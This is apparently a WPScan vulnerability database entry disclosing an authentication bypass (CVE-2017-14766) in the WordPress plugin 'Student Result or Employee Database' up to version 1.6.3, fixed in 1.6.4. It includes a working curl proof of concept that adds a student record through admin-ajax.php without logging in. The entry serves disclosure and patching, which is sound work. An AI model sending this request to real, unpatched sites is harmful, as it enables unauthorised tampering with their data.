Student Result or Employee Database <= 1.6.3 - Auth Bypass



Proof of Concept
curl -i -s -k  -X 'POST' -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: http://localhost/wp-admin/admin.php?page=ssr_add_results' --data-binary 'action=ssr_add_st_submit&rid=123&rn=456&stn=john&stfn=smith&stpy=2017&stcgpa=5.00&stsub=Subject+3&stpy2=01011990&stpy3=male&stpy4=address&stpy5=smith&stpy6=extra1&stpy7=extra2&upload_image=' 'https://localhost/wp-admin/admin-ajax.php'

Affects Plugin

fixed in version 1.6.4

References

CVE 2017-14766
URL https://limbenjamin.com/articles/simple-student-result-auth-bypass.html
URL https://plugins.trac.wordpress.org/changeset/1733325/simple-student-result

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Submitter Benjamin Lim
Submitter Website https://limbenjamin.com
Views 3913
Verified No
WPVDB ID 8920

Timeline

Publicly Published 2017-09-21 (almost 2 years ago)
Added 2017-09-28 (almost 2 years ago)
Last Updated 2017-09-29 (almost 2 years ago)